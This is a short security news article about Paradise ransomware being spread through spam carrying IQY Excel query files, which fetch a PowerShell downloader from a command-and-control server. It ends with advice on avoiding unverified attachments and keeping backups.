Internet Query Files (IQY) were used to deliver a new variant of Paradise ransomware, as reported by Last Line. The said file type has not been associated with this ransomware family before.
In the past, IQY files were typically used in other malware campaigns such as the Necurs botnet that distributes IQY files to deliver FlawedAmmy RAT. Bebloh and Ursnif also spreads via IQY and PowerShell.
IQY files are used by Microsoft Excel. The files have URLs and other components necessary for making queries on the internet. According to Last Line researchers, IQY may not be as well-known as other Microsoft Office file formats, but it can still be weaponized. The attack does not use any vulnerability in Microsoft Excel, so even fully patched systems are exposed to risk.
IQY can be used to download an Excel formula that could exploit system processes such as PowerShell and CMD. It can also evade detection, since it’s a legitimate Excel file type.
The ransomware is distributed through a spam campaign with IQY attachments. Once the attachment is opened, the file retrieves a malicious Excel formula from the threat actors’ command and control (C&C) server. The formula has a command that will run a PowerShell command, which downloads an executable.
The researchers observed that the activity, which targets an organization in Asia, lasted for less than two days.
Shielding systems against ransomware
Ransomware has always been a prevalent threat that seems to only grow through the years. As reported in the Trend Micro 2019 Annual Security Roundup, the detection of ransomware-related threats increased by over 6 million last year; from over 55 million in 2018 to over 61 million in 2019.
Ransomware’s success can be attributed to its constant evolution — threat actors continually develop ransomware features and leverage new file types to stealthily appear like non-malicious files and evade detection.
Enterprises and users can follow a few best practices to defend against ransomware. Since ransomware is usually distributed through malicious emails, employees should avoid downloading attachments and clicking on embedded links from unverified sources. Users should also perform regular backups of important files to minimize disruption in case of an infection.